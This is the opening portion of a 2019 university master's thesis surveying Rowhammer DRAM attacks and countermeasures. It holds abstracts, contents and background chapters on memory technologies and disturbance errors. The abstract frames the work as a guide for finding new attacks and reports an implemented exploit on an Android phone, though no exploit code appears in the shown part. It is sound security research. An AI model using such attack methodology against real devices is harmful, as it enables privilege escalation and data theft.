University of Patras DEPARTMENT OF COMPUTER ENGINEERING AND INFORMATICS DEPARTMENT OF ELECTRICAL AND COMPUTER ENGINEERING

POSTGRADUATE PROGRAM: INTEGRATED HARDWARE AND SOFTWARE SYSTEMS

Postgraduate Thesis of IHSS postgraduate student, University of Patras, Greece

Lidia Pocero Fraile

Subject « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture »

Supervisor

Odysseas Koufopavlou

Postgraduate Thesis number:

Patras, March 2019 CERTIFICATION It is certified that the Postgraduate Thesis entitled « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture »

of IHSS postgraduate student, University of Patras, Greece

Lidia Pocero Fraile was defended in public and was examined in the Department of Electrical and Computer Engineering, University of Patras on 26/03/2019

Supervisor O. Koufopavlou

Committee member Committee member G. Theodoridis N. Sklavos

Postgraduate Thesis number:

Subject: « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture » Student: Supervisor: L. Pocero O. Koufopavlou

Abstract: The increasing demand for main memory capacity has driven continuous DRAM scaling. The high DRAM density increases the coupling between adjacent DRAM cells, thereby exacerbating DRAM failures and worsening cell reliability. This thesis investigates the reliability issues and security implications of the rowhammer bug, where repeated accesses to DRAM rows can cause bit flips in an adjacent row. The bug occurs in most of today's DDR modules, with fatal consequences for security. The fundamental software security assumption that a memory location can be written only by a process with write access, guaranteeing that memory contents do not change unless the modification is legitimate, is easily broken when high-frequency accesses to one memory row can modify the data contained in an adjacent memory region. Since the initial discovery of this security issue, many studies have implemented attacks that leverage rowhammer by exploiting the corruption of sensitive data in memory. In light of this danger, this thesis presents an overview of this type of attack, including the attacks themselves, threat models, and countermeasures. The goal of this research is to exhaustively overview attacks and countermeasures in order to survey the various existing attack directions and highlight the security risks they can pose to different kinds of systems. We propose a specific exploitation vector methodology for rowhammer and summarize all existing attack techniques under three vector primitives: discover the memory information of the system under attack, choose a method to directly access DRAM, and find a location to hammer. The study aims to provide a guide that can be used to reveal new attacks by combining different techniques for each primitive.
Previous research has demonstrated that these exploits are effective not only against desktop computers or cloud servers but also against mobile devices, without relying on any software vulnerability. We focus on the study of the attack against ARM architectures by implementing our own attack in native code on an LG Nexus 5 Android device. We carry out our own version of the Phys Feng Shui technique [1], identifying the most crucial and prominent issues that emerge when implementing it on a real system.

Keywords: Rowhammer Attack; Microarchitectural Attacks; Hardware Vulnerability; Software-based Fault Injection; Memory Disturbance Errors;

Περίληψη: Η ανάγκη για αυξανόμενη χωρητικότητα των συστημάτων κύριας μνήμης έχει οδηγήσει σε συνεχή συρρίκνωση της DRAM. Η υψηλή πυκνότητα της DRAM αυξάνει την δυνατότητα παρεμβολής μεταξύ γειτονικών κυττάρων DRAM, αυξάνοντας έτσι τις αποτυχίες της RAM και επιδεινώνοντας την αξιοπιστία των κυττάρων μνήμης RAM. Αυτή η διπλωματική εργασία διερευνά το ζήτημα αξιοπιστίας και τις συνέπειες στην ασφάλεια σε σχέση με το rowhammer σφάλμα, όπου επαναλαμβανόμενες προσβάσεις σε σειρές DRAM μπορούν να προκαλέσουν ανατροπές bit σε μια γειτονική σειρά. Αυτό το σφάλμα εμφανίζεται στις περισσότερες μονάδες DDR σήμερα, με καταστρεπτικές συνέπειες για την ασφάλεια. Η θεμελιώδης αρχή της ασφάλειας του λογισμικού ότι μια θέση μνήμης μπορεί να γραφεί μόνο από μια διαδικασία με πρόσβαση εγγραφής καταρρέει εύκολα όταν το διάβασμα μιας σειράς της μνήμης με υψηλή συχνότητα μπορεί να τροποποιήσει δεδομένα που περιέχονται σε μια γειτονική περιοχή της μνήμης. Από την αρχική ανακάλυψη αυτού του ζητήματος ασφάλειας, πολλές προηγούμενες μελέτες έχουν υλοποιήσει αρκετές επιθέσεις που αξιοποιούν το rowhammer, εκμεταλλευόμενες την αλλοίωση μνήμης σε ευαίσθητα δεδομένα. Σε σχέση με τον παραπάνω κίνδυνο αυτή η διπλωματική εργασία μελετάει τις επιθέσεις τύπου «rowhammer attack», συμπεριλαμβάνοντας τις επιθέσεις, το μοντέλο της απειλής και τα μέτρα αντιμετώπισης. Ο στόχος της έρευνας είναι η διεξοδική επισκόπηση των επιθέσεων και των αντιμέτρων, προκειμένου να διερευνηθούν οι διαφορετικές υπάρχουσες επιθετικές κατευθύνσεις και να τονιστούν οι κίνδυνοι ασφαλείας που μπορούν να δημιουργηθούν σε διαφορετικά συστήματα. Προτείνεται μια συγκεκριμένη μεθοδολογία για την επίθεση «rowhammer» και η κατηγοριοποίηση σε σχέση με αυτή όλων των υπαρχουσών τεχνικών επίθεσης. Η μεθοδολογία αποτελείται από τρία διαφορετικά βήματα: ανακάλυψη των πληροφοριών της αρχιτεκτονικής της μνήμης του υπό επίθεση συστήματος, επιλογή μεθόδου για την άμεση πρόσβαση στην DRAM και εύρεση των ευπαθών θέσεων στην μνήμη.
Η μελέτη στοχεύει να παρέχει έναν οδηγό που μπορεί να χρησιμοποιηθεί για να αποκαλύψει νέες επιθέσεις που συνδυάζουν διαφορετικές τεχνικές σε κάθε βήμα. Προηγούμενες έρευνες έχουν δείξει ότι η εκμετάλλευση του rowhammer δεν είναι μόνο αποτελεσματική κατά των επιτραπέζιων υπολογιστών ή του υπολογιστικού νέφους (cloud), αλλά και κατά των φορητών συσκευών, χωρίς να σχετίζεται με αδυναμίες του λογισμικού. Εστιάζουμε στην μελέτη των «rowhammer» επιθέσεων σε ARM αρχιτεκτονικές με την «native code» υλοποίηση επίθεσης σε συσκευή LG Nexus 5 Android. Υλοποιούμε την «Phys Feng Shui» τεχνική, προσδιορίζοντας τα πιο σημαντικά ζητήματα που προκαλούνται από την υλοποίηση σε ένα πραγματικό σύστημα.

CONTENTS

CONTENTS ...... 1
LIST OF FIGURES ...... 3
LIST OF TABLES ...... 4
1 INTRODUCTION ...... 5
2 THEORETICAL BACKGROUND ...... 7
2.1 RAM Memory Types ...... 7
2.1.1 Disturbance Errors in Memories ...... 8
2.2 DRAM Technologies ...... 9
2.3 DRAM Architecture ...... 12
2.4 Refresh Mechanism on DDR Technologies ...... 15
2.5 DRAM Memory Controller ...... 16
2.6 Memory Hierarchy ...... 17
2.7 Physical RAM Management on Linux ...... 20
2.8 Memory Management ...... 23
2.8.1 DMA (Direct Memory Access) ...... 27
3 DISTURBANCE MECHANISM ON DRAM AND ROWHAMMER ...... 28
3.1 Characterization of the Rowhammer Problem ...... 29
3.1.1 Mathematical Characterization of the Rowhammering Threshold ...... 30
3.1.2 Data Pattern and Weak Cells Effect ...... 31
3.2 Triggering Rowhammer ...... 31
3.2.1 Rowhammer Types ...... 33
3.3 Vulnerable DRAM Types ...... 35
4 ROWHAMMER EXPLOITATION ...... 37
4.1 Under Attack Memory Information ...... 40
4.1.1 One-location Hammer ...... 41
4.1.2 Same Bank Row Detection ...... 42
4.1.3 Find Adjacent Memory Rows ...... 43
4.2 Fast Uncached Direct DRAM Access ...... 48
4.2.1 Explicit Cache Flush ...... 48
4.2.2 Cache Eviction Sets ...... 49
4.2.3 Non-Temporal Store Instructions ...... 53
4.2.4 DMA Access ...... 54
4.3 Where To Hammer ...... 55


4.3.1 Random Hammer ...... 55
4.3.2 Physical Memory Massaging ...... 56
4.3.3 Memory Waylaying ...... 68
4.4 Attack Interface ...... 69
4.4.1 Page Table Corruption Attacks ...... 70
4.4.2 Escape Sandbox Native Client Restrictions ...... 70
4.4.3 Attacks Across Shared Resources ...... 71
4.4.4 JavaScript Based Remote Attack from Browsers ...... 71
4.4.5 Remote Attack On Fast RDMA-Enabled Networks ...... 72
4.4.6 Trusted Execution Environments (TEE) ...... 72
4.4.7 Flipping Opcodes ...... 73
4.5 Attack Target ...... 73
4.5.1 System Privilege Escalation ...... 74
4.5.2 Remote System Privilege Escalation ...... 75
4.5.3 Confidential Attacks ...... 75
4.5.4 DoS Attacks ...... 77
5 RH COUNTERMEASURES ...... 78
5.1 Disable Under Attack Functionalities ...... 78
5.2 Hardware-Based Solutions ...... 79
5.3 Software-Based Mitigations ...... 80
6 INVESTIGATION OF ROWHAMMER AT EMBEDDED SYSTEMS ...... 83
6.1 ARM Architecture ...... 83
6.2 Study Of Rowhammer At Single-Board Computers ...... 86
6.3 DRAMMER: Deterministic Rowhammer Attack On Mobile Platforms ...... 89
6.3.1 Mobile Platforms Characteristics ...... 90
6.3.2 Device Under Attack ...... 93
6.3.3 Drammer Attack Primitives ...... 99
6.3.4 DRAMMER Attack Implementation ...... 100
6.3.5 Bit Flip Exploitability ...... 113
6.3.6 Evaluation ...... 114
7 CONCLUSION ...... 116
8 APPENDIX 1: Side Channel Attacks ...... 118
9 ACKNOWLEDGEMENTS ...... 119
10 BIBLIOGRAPHY ...... 121


LIST OF FIGURES

FIGURE 1 SRAM CELL 7
FIGURE 2 DRAM CELL 8
FIGURE 3 DIMM MODULES ARCHITECTURE EXAMPLE 12
FIGURE 4 2GB DDR3 DIMM ARCHITECTURE. FIGURE IN [12] 14
FIGURE 5 TYPICAL MEMORY HIERARCHY 18
FIGURE 6 CACHE PLACEMENT. FIGURE IN [20] 19
FIGURE 7 COMPLEX ADDRESSING SCHEME IN THE LLC, 64 B CACHE LINE, 4 SLICES AND 2048 SETS PER SLICE. FIGURE IN [22] 20
FIGURE 8 COMPLEX ADDRESSING FUNCTION. FIGURE IN [22] 20
FIGURE 9 MEMORY LAYOUT. FIGURE IN [25] 21
FIGURE 10 MEMORY ZONES FOR 8GB RAM. FIGURE IN [24] 21
FIGURE 11 KERNEL ALLOCATION OVERVIEW. FIGURE IN [26] 22
FIGURE 12 OVERVIEW OF ALLOCATORS IN THE KERNEL. FIGURE IN [27] 23
FIGURE 13 X86 PAGE TABLE ENTRY (PTE). FIGURE IN [31] 24
FIGURE 14 VIRTUAL TO PHYSICAL MAPPING FOR X86-32BIT PAGE TABLE ENTRY. FIGURE IN [31] 24
FIGURE 15 VIRTUAL MEMORY SYSTEM SCHEME. FIGURE IN [32] 25
FIGURE 16 VIRTUAL TO PHYSICAL ADDRESS MAPPING. FIGURE IN [32] 26
FIGURE 17 PROCESS ADDRESS SPACE. FIGURE IN [32] 26
FIGURE 18 DIFFERENT HAMMERING STRATEGIES. FIGURE IN [45] 33
FIGURE 19 ROWHAMMER ERROR RATE VS. MANUFACTURING DATE. FIGURE IN [51] 35
FIGURE 20 EFFICIENT GPU CACHE EVICTION STRATEGY. FIGURE IN [59] 53
FIGURE 21 CACHED AND NON-TEMPORAL MEMORY ACCESSES. FIGURE IN [48] 54
FIGURE 22 ROWHAMMER BIT FLIPS FOR DIFFERENT NETWORK CONFIGURATIONS. FIGURE IN [60] 55
FIGURE 23 4-KBYTE PAGE TABLE ENTRY 57
FIGURE 24 HEAP LAYOUT AND EXPLOITATION. FIGURE IN [58] 60
FIGURE 25 MEMCACHED EXPLOIT. FIGURE IN [60] 61
FIGURE 26 ALIGNMENT PROBING PRIMITIVE. FIGURE IN [47] 62
FIGURE 27 PARTIAL REUSE PRIMITIVE. FIGURE IN [47] 62
FIGURE 28 BIRTHDAY HEAP SPRAY PRIMITIVE. FIGURE IN [47] 62
FIGURE 29 FLIP BIT EXPLOITATION: PIVOT TO A COUNTERFEIT OBJECT. FIGURE IN [47] 63
FIGURE 30 MEMORY DEDUPLICATION FOR CONTROL OVER PHYSICAL MEMORY LAYOUT. FIGURE IN [43] 64
FIGURE 31 PAGE TABLE REPLACEMENT ATTACK. FIGURE IN [56] 66
FIGURE 32 MEMORY AMBUSH. FIGURE IN [64] 68
FIGURE 33 PSEUDO CODE ILLUSTRATING ATTACKS AGAINST THE OPENSSH SERVER: ON THE LEFT THE ORIGINAL CODE, ON THE RIGHT THE CODE AFTER THE BIT FLIP 77
FIGURE 34 ADDRESS TRANSLATIONS USING SHORT-DESCRIPTOR FORMAT TRANSLATION TABLE. FIGURE IN [94] 84
FIGURE 35 BOUNDARIES BETWEEN TTBR0 AND TTBR1 IN A COMMON ARMV7 CONFIGURATION 84
FIGURE 36 FIRST-LEVEL DESCRIPTOR FORMATS 85
FIGURE 37 SECOND-LEVEL DESCRIPTOR FORMATS 85
FIGURE 38 ARMV7 32-BIT VIRTUAL ADDRESS DESCRIPTION 86
FIGURE 39 CP15 C1 SYSTEM CONTROL REGISTER IN VMSA IMPLEMENTATION. FIGURE IN [94] 88
FIGURE 40 FORMAT OF SCTLR REGISTER IN ARMV7-A IMPLEMENTATION. FIGURE IN [94] 88
FIGURE 41 /PROC/PAGETYPEINFO KERNEL FILE INFORMATION 98
FIGURE 42 PAGE TABLE LAYOUT WALK ON ANDROID ARM 98
FIGURE 43 VICTIM L* BLOCK AND CRUCIAL INFORMATION OF THE FLIP BIT POSITION. AGGRESSOR ROWS IN ORANGE ABOVE AND BELOW THE VICTIM ROW. 102
FIGURE 44 AVAILABLE MEMORY AFTER EXHAUSTING L BLOCKS 102
FIGURE 45 AVAILABLE MEMORY BEFORE STARTING THE ATTACK 102
FIGURE 46 AVAILABLE MEMORY AFTER EXHAUSTING L AND M BLOCKS 103
FIGURE 47 AVAILABLE MEMORY AFTER RELEASING THE VICTIM L* BLOCK 104


FIGURE 48 BUDDY ALLOCATOR BEHAVIOUR ON THE ALLOCATION OF M BLOCKS 104
FIGURE 49 AVAILABLE MEMORY AFTER ALLOCATING M BLOCKS IN THE L* LOCATION 105
FIGURE 50 AVAILABLE MEMORY AFTER RELEASING THE M* VICTIM BLOCK 105
FIGURE 51 AVAILABLE MEMORY AFTER RELEASING ALL THE L BLOCKS 106
FIGURE 52 AVAILABLE MEMORY AFTER A CHILD SPRAYING THE PTS 107
FIGURE 53 AVAILABLE MEMORY LEFT TO THE PARENT PROCESS 107
FIGURE 54 VICTIM PAGE TABLE ENTRY FORMAT 108
FIGURE 55 EXAMPLE OF PHYSICAL ADDRESS OF SOURCE PAGE P FROM THE PHYSICAL PAGE OF THE TARGET PT 108
FIGURE 56 RELATIVE POSITIONS OF SOURCE PAGE AND TARGET PAGE IN VICTIM BLOCK L* 109
FIGURE 57 FORMAT OF VIRTUAL ADDRESS FOR SOURCE PAGE P 111
FIGURE 58 FORMAT OF TARGET PAGE TABLE AT VULNERABLE VICTIM PAGE 111
FIGURE 59 VICTIM ROW AND AGGRESSOR ROWS 113

LIST OF TABLES

TABLE 1 DDR TECHNICAL CHARACTERISTICS 10
TABLE 2 LPDDR TECHNICAL CHARACTERISTICS 12
TABLE 3 DDRX AND LPDDRX ORGANIZATION PARAMETERS 13
TABLE 4 DRAM TIMINGS 16
TABLE 5 ROWHAMMER METHODS 40
TABLE 6 VARIOUS TECHNIQUES TO LEARN THE REQUIRED MEMORY INFORMATION 41
TABLE 7 VARIOUS TECHNIQUES USED TO DIRECTLY ACCESS THE DRAM 48
TABLE 8 GPU TWO-LEVEL CACHE SUMMARY 52
TABLE 9 WHERE TO HAMMER 55
TABLE 10 ATTACK INTERFACE 70
TABLE 11 ATTACK TARGET 73
TABLE 12 MOST RECENT RASPBERRY PI MODEL SPECIFICATIONS 87
TABLE 13 MOST RECENT BEAGLEBONE MODEL SPECIFICATIONS 87
TABLE 14 GENERAL CHARACTERISTICS OF THE LG NEXUS 5 DEVICE 93
TABLE 15 BUILD PROPERTIES OF THE DEVICE UNDER ATTACK 97


1 INTRODUCTION

Embedded system nodes, like most computing units, cannot be considered trusted due to many known vulnerabilities. Typically, software tools (e.g., antivirus, antimalware, firewalls) can protect a system from attackers who take advantage of those vulnerabilities to inject malicious software. However, there exist security gaps and vulnerabilities that cannot be identified by the aforementioned software tools, since they are not due to errors in software applications, drivers or the operating system but rather to the computer architecture and hardware structure itself. Software created to exploit these vulnerabilities remains hidden from most software cybersecurity tools and thus constitutes a serious security risk for all devices built on these commodity, vulnerable structures. As the cell density of DRAM modules keeps increasing to meet the growing demand for memory capacity in modern computers and embedded systems, the electromagnetic interference between memory cells increases significantly. This interference can eventually corrupt the data stored in memory. In particular, the widespread existence of disturbance errors in most common DRAM modules manufactured since 2012 has been extensively proven [1] [2]. The memory disturbance error observed in common DRAM modules is widely known as the Rowhammer vulnerability. It was discovered that when a specific row of a DDR (Double Data Rate) memory bank is accessed repeatedly, i.e. is opened (activated) and closed (pre-charged) within a DRAM refresh interval, one or more bit flips can occur in physically adjacent DRAM rows, changing their values [1]. For decades, the defences against memory corruption have left aside the threat of hardware vulnerabilities. Indeed, several researchers have observed that the Rowhammer vulnerability can be exploited to mount an attack and bypass most of the established software security and trust features.
This specific hardware vulnerability allows an attacker to alter data in memory without direct access, thus breaking MMU (Memory Management Unit) isolation without accessing the victim row at all and without relying on any design or implementation flaw in the isolation mechanism. Such bugs not only affect memory reliability by breaking all popular forms of isolation but also cause a serious security breach that can be used to corrupt system memory, crash a system, obtain and modify secret data, or take over the entire system. Rowhammer is a software-based fault injection attack that uses software to induce faults in the underlying hardware in a controllable manner, which is difficult to prevent. This attack has been categorized under the microarchitectural attacks family as the most dramatic and widespread example of fault injection, and it has even been shown to be mountable remotely [3]. Since the first publication of the issue [1], the ability of the Rowhammer attack to defy abstraction barriers between different security domains has been utilized to develop ever more powerful attacks on various systems. On the other hand, these attacks have sparked interest in developing effective and efficient mitigation techniques. There exists a need to dissect the rowhammer attacks to understand the threat model and determine the attack primitive methodology by studying the common characteristics between the various forms that have been published to date. We break down the attack process into three

distinct steps that must be implemented in every threat model trying to exploit the rowhammer vulnerability. An attacker must determine the specific memory architecture characteristics, gathering the necessary memory information to determine the physical position of the aggressor rows. Fast direct access to DRAM is the second challenge of the methodology, and it is directly related to the features available on each system. Finally, the attacker must decide where to hammer, which in most cases means finding a way to place the sensitive data into a vulnerable location discovered during a previous templating phase. The practical end-to-end attack implementations are categorized into groups that share common techniques to achieve each of the aforementioned primitives. Furthermore, they are grouped into attacks with common attack targets and attacks that share the same interfaces to achieve the exploitation of the vulnerability. The aim of this thesis is to provide an overall study of this specific vulnerability and its security implications and to clarify each aspect related to the rowhammer attack, in order to provide a useful guide for researchers to identify new attacks and defences. We pay special attention to the challenges and implications of implementing the attacks on embedded systems such as mobile phones, tablets and tiny affordable computers such as the Raspberry Pi and BeagleBone boards based on the ARM architecture. Also, our implementation of the attack for Android on the LG Nexus 5 device brings to light the issues of a practical attempt to trigger the rowhammer attack on a real system. First of all, the necessary background information is provided to understand every phase of the attack, from the DRAM architectures and disturbance error analysis to memory controllers and kernel memory allocator behaviour.
Section 3 is dedicated to the rowhammer vulnerability problem statement, studying the origins of the vulnerability and its relationship with specific memory architectural parameters and data patterns. We also summarize the DRAM types known to be vulnerable to date. Finally, we present the three existing methods to trigger the vulnerability, aiming to understand the applicability of each one to different systems. The categorization of the rowhammer attacks into different primitive groups, targets, and interfaces presented in Section 4 is the result of an investigation over all the different exploitations published to date. In addition, a new systematic categorization of the defences proposed by the research community to confront the security issue can be found in Section 5. Based on whether the intention is to completely disable the vulnerability or only its exploitability by an attacker, each available countermeasure is analyzed in terms of applicability and success on different vulnerable systems. Finally, our research regarding Rowhammer attacks on embedded systems is presented in Section 6. In that section, we discuss theoretical research on the challenges posed by the target ARM architecture, combined with an empirical, practical implementation of an Android attack on a real ARMv7 architecture.


2 THEORETICAL BACKGROUND

2.1 RAM MEMORY TYPES Computer memory is generally classified as either internal or external memory. Internal memory, or main memory, refers to memory that stores small amounts of data that can be accessed quickly while the computing system is running. On the other hand, external memory refers to storage devices that can retain or store data persistently. These can be embedded, such as hard disks and solid-state drives, or removable storage devices such as USB flash drives or compact disks. There are basically two kinds of internal memory: ROM (Read Only Memory), which is non-volatile and used mainly to start or boot up a computing system, and RAM (Random Access Memory), which is a fast read/write but volatile memory. The RAM is the memory that stores the data and machine code currently being used. This memory device allows the time of reading/writing data to be independent of the data's physical location inside the memory. RAM takes the form of an integrated circuit mounted in modules and comes in a variety of physical interface connectors, capacities (in MB or GB), speeds (in MHz or GHz) and architectures. Typically, two, three or four of these modules are installed in the computer system's motherboard. RAM comes in two primary forms: SRAM and DRAM. SRAM (Static Random Access Memory) consists of circuits capable of retaining the stored information as long as power is applied. A latch is formed by two inverters connected as shown in Figure 1. The transistors connect the latch to two bit lines, acting as switches that can be opened or closed under the control of the word line. When the word line is activated (1-level), the sense/write circuits are connected to the bit lines to read or store a value. When the word line is at 0-level, the transistors are turned off and the latch retains its information, without needing any refresh, as long as the word line is not activated.
SRAM offers faster access speed and lower power consumption, but it is also more expensive (higher manufacturing cost) and of lower memory capacity than DRAM. It is normally used to build the CPU's speed-sensitive caches (L1, L2, L3), hard drive buffers/caches and Digital-to-Analog Converters (DACs) on video cards.

Figure 1 SRAM cell

The DRAM stores binary information in the form of electric charge held in capacitors. The charge stored in the capacitors tends to leak away over a period of time, and thus the capacitors must be periodically recharged to retain their data. To store information in this cell, the

transistor is turned on and an appropriate voltage is applied to the bit line to charge the capacitor. The cell starts to discharge after the transistor is turned off. The stored information can be read correctly only until the capacitor's charge drops below a specific threshold value. Therefore, for dynamic memory to work, either the CPU or the memory controller has to recharge all of the capacitors before they discharge: the memory controller reads the memory and then writes it right back. This dynamic refreshing takes time, which slows down the memory and increases power consumption. On the other hand, the DRAM cell is the simplest memory circuit, cheaper to produce, and it achieves bigger capacities with higher packaging density than the more complex SRAM cell. Because of these characteristics, DRAM is typically used for system memory and video graphics memory.

Figure 2 DRAM cell

2.1.1 Disturbance Errors in Memories Memory errors are encountered when the value read from memory does not match the value that is supposed to be there. So-called hard errors are associated with persistent physical defects on the memory chip. On the other hand, errors induced by a particle strike that upsets internal data while the circuit itself remains undamaged are referred to as soft errors. Disturbance errors, which occur whenever there is a strong enough interaction between two circuit components that should be isolated from each other, are classified as a reliability problem. This issue can afflict different kinds of memory and storage technologies, such as SRAM, flash, DRAM and hard disks. Many different modes of disturbance are possible depending on the specific components that interact. Disturbance generally increases with increasing data storage density; as the process technology scales down, robustness and reliability are compromised. Two of the major typical SRAM failure modes are write errors and read disturbance [4]. In addition, soft errors and half-select disturbance have arisen as failure sources. Even though they are unpredictable, both susceptibilities are critical reliability challenges in modern SRAM designs. When a single event causes a multi-bit upset, a single word has multiple corrupted bits, which cannot be fixed by using error-correcting codes. The easiest way to avoid this is to place the bits of a logical word on cells that are not physically adjacent. This bit-interleaving strategy, however, aggravates the half-select disturbance problem [4]. A cell is half-selected when it belongs to the selected row but to a non-selected column group. On an activated word line, the selected cells are written, while the half-selected cells are disturbed by the pre-charged write bit lines: their access transistor turns on and the internal data can flip.
All these SRAM failure modes have been studied, and different optimizations have been proposed in [4] [5] [6].
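The effect of bit-interleaving on a multi-bit upset can be illustrated with a small sketch. The parameters below (four 8-bit logical words interleaved across one 32-bit physical row) are hypothetical, chosen only to show why two physically adjacent corrupted cells end up in different logical words, each correctable as a single-bit error:

```python
# Hypothetical layout: 4 logical words of 8 bits each, bit-interleaved
# across a 32-bit physical row, so physical column c holds
# bit (c // 4) of logical word (c % 4).
WORDS = 4

def logical_position(col):
    """Map a physical column to (word, bit) under 4-way interleaving."""
    return col % WORDS, col // WORDS

# A particle strike corrupts two physically adjacent columns.
upset = [10, 11]
hit_words = sorted({logical_position(c)[0] for c in upset})

# Each affected logical word sees only a single-bit error, which a
# single-error-correcting ECC code can fix.
print(hit_words)  # [2, 3]: the adjacent flips land in different words
```

Without interleaving (both flips in the same word), the same ECC code would only detect, not correct, the upset.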


DRAM manufacturers have long been aware of disturbance errors and mitigate them both through inter-cell isolation, using circuit-level techniques, and by screening for disturbance errors during post-production testing; nevertheless, studies in 2014 exposed the existence and the widespread nature of disturbance errors in then-current DRAM chips [1]. The root cause of the disturbance is voltage fluctuation on the wordline. The wordline of a row must be enabled by raising its voltage in order to access any cell of that row. Many activations of the same row make the wordline toggle repeatedly on and off, which has a disturbance effect on adjacent rows. Some cells of the nearby rows can then leak their charge before their value is restored, permanently changing the stored data [1].
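A back-of-the-envelope calculation shows why this toggling is exploitable. Using typical DDR3-era values (assumed here for illustration, not taken from a specific datasheet): each row is refreshed once per 64 ms refresh window, and two ACTIVATE commands to the same bank must be at least one row cycle time (roughly 50 ns) apart, so an attacker can activate an aggressor row a very large number of times before the victim row's charge is restored:

```python
# Assumed, typical DDR3-era timing values (illustrative only).
tREFW_ns = 64_000_000  # refresh window: each row refreshed once per 64 ms
tRC_ns = 50            # row cycle time: minimum gap between two ACTIVATEs

# Upper bound on activations of one row within a single refresh window.
activations = tREFW_ns // tRC_ns
print(activations)  # 1280000
```

Experimental studies report that far fewer activations than this bound (on the order of tens to hundreds of thousands) already suffice to flip bits in vulnerable modules [1].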

2.2 DRAM TECHNOLOGIES RAM modules are cards (printed circuit boards) with DRAM memory chips soldered on one or both sides. The DRAM implementation is based on an electrical circuit topology that allows high memory densities to be reached, integrating hundreds or thousands of megabits. In addition to the DRAM chips, the modules carry an integrated circuit that allows the computer to identify them through a communication protocol. The modules are connected to the rest of the components through pins that follow the industry standard. The Single In-line Memory Module (SIMM) DRAM package is now obsolete. The Dual In-line Memory Module (DIMM) is the current physical memory module, with pins on both sides of the module and several architectures for different platforms. The original DIMMs had a 168-pin connector supporting a 64-bit data bus, twice the data width of SIMMs, which translates to faster overall performance. The latest DIMMs, based on DDR4, have 288-pin connectors for increased data throughput. Double Data Rate SDRAM (DDR SDRAM) is the most common type of DRAM in use today. It is a Synchronous DRAM (SDRAM) memory type [7], whose access speed is directly synchronized with the CPU's clock, and it operates on the CPU memory bus. The memory is divided into separate banks, so the CPU can process overlapping requests in parallel (pipelining) per clock cycle, which results in higher overall transfer rates. DDR nearly doubles the transfer rate by transferring data on both the rising and the falling edges of the clock signal, without any increase in the clock frequency. To access the data at this high rate, the memory cells are organized into two groups that are accessed separately [8].
The nomenclature used to define DDR-type memory modules is DDRx-yyyy PCx-zzzz, where x represents the DDR generation, yyyy the effective frequency in MHz, and zzzz the maximum data transfer rate in megabytes per second (MB/s) that can be achieved between the memory module and the memory controller. The transfer rate depends on two factors: the data bus width (usually 64 bits) and the effective working frequency.
 DDR1: Became a standard in 2000 and was an advancement over SDRAM technology that increased memory bandwidth and performance. It comes as DIMM modules with 184 pins for desktop computers and 144 pins for laptops. It saves power by working at a lower standard voltage (2.5V or 2.6V) [9]. The available types are: DDR 200 PC1600, DDR 266 PC2100, DDR 333 PC2700, DDR 400 PC3200, DDR 433 PC3500 and DDR 500 PC4500 [10].


 DDR2: The evolutionary upgrade to DDR1. While still double data rate, DDR2 is faster because it can run at higher clock speeds, enabling effective operation at twice the DDR1 bus speed. It consumes less power than its predecessor by reducing the operating voltage (1.8V) [9]. DDR2 modules are available in several form factors suitable for diverse applications, including 240-pin full-size DIMMs, 200-pin SO-DIMMs, 244-pin Mini-DIMMs, and 240-pin FB-DIMMs. Very Low Profile (VLP) DIMMs and Mini-UDIMM options are also available for compact systems. The available types are: DDR2-400 PC2-3200, DDR2-533 PC2-4200, DDR2-667 PC2-5300, DDR2-800 PC2-6400, DDR2-1066 PC2-8600 and DDR2-1200 PC2-9000 [10].
 DDR3: It improves performance over DDR2 SDRAM through advanced signal processing (reliability). It achieves greater memory capacity, lower power consumption (1.5 V), and higher standard clock speeds (up to 800 MHz) [9]. It appears in a wide range of form factors, including SODIMM and Mini-DIMM. DDR3 SDRAM is supported by the latest CPUs and chipsets, such as the Intel Core i7 series, the AMD AM3 Phenom processor and the latest AMD Embedded Enterprise chipsets. The available types are DDR3-800 PC3-6400, DDR3-1066 PC3-8500, DDR3-1333 PC3-10600, DDR3-1600 PC3-12800, DDR3-1866 PC3-14900, DDR3-2133 PC3-17000, DDR3-2400 PC3-19200 and DDR3-2666 PC3-21300 [10].
 DDR4: Released to the market in 2014, it is a higher-speed successor to the DDR2 and DDR3 technologies. Its internal bank organization and 8n-prefetch architecture enable high-speed operation. Its primary advantages include higher module density, lower voltage requirements (1.2 to 1.4 V) with frequencies up to 1600 MHz, and better manufacturability. It uses a 288-pin configuration, which also prevents backward compatibility [9].
The available types are DDR4-1600 PC4-12800, DDR4-1866 PC4-14900, DDR4-2133 PC4-17000, DDR4-2400 PC4-19200 and DDR4-2666 PC4-21300 [10]. A comparison of the technical characteristics of the current commercial DDR generations is shown below in Table 1. The data has been collected from [8] [9].

                      DDR2              DDR3              DDR4
Clock frequency       200 ~ 400 MHz     400 ~ 800 MHz     1066 ~ 1600 MHz
Bandwidth             4.2 ~ 6.4 GB/s    8.5 ~ 14.9 GB/s   17 ~ 21.3 GB/s
Data rate (per pin)   400 ~ 800 Mbps    800 ~ 1600 Mbps   2000 ~ 3200 Mbps
Core voltage          1.8V              1.5V/1.35V        1.4V/1.2V
I/O voltage           1.8V              1.5V/1.35V        1.2V
I/O width             x4/x8/x16         x4/x8/x16         x4/x8/x16
Prefetch              4n                8n                8n
Number of banks       4/8               8                 16 (in 2 or 4 selectable bank groups)
Burst length          4/8               8/4 with BC       8/4 with BC
Density               256Mb ~ 4Gb       512Mb ~ 8Gb       2Gb ~ 16Gb

Table 1 DDR technical characteristics
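The PCx-zzzz figure can be recomputed directly from the DDRx-yyyy effective transfer rate, assuming the usual 64-bit (8-byte) data bus described above; the short sketch below illustrates the arithmetic behind the module names:

```python
# Peak bandwidth of a DDR module: effective transfers per second (MT/s,
# the yyyy in DDRx-yyyy) times the bus width, assumed to be 64 bits.
BUS_BYTES = 64 // 8

def peak_bandwidth_mb_s(mega_transfers_per_s):
    """Peak bandwidth in MB/s (the zzzz in PCx-zzzz) for a MT/s rating."""
    return mega_transfers_per_s * BUS_BYTES

print(peak_bandwidth_mb_s(1600))  # 12800 -> DDR3-1600 is PC3-12800
print(peak_bandwidth_mb_s(2400))  # 19200 -> DDR4-2400 is PC4-19200
```

Marketing names round this value (e.g. DDR2-533 is sold as PC2-4200 although 533 x 8 = 4264), so small discrepancies against the lists above are expected.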


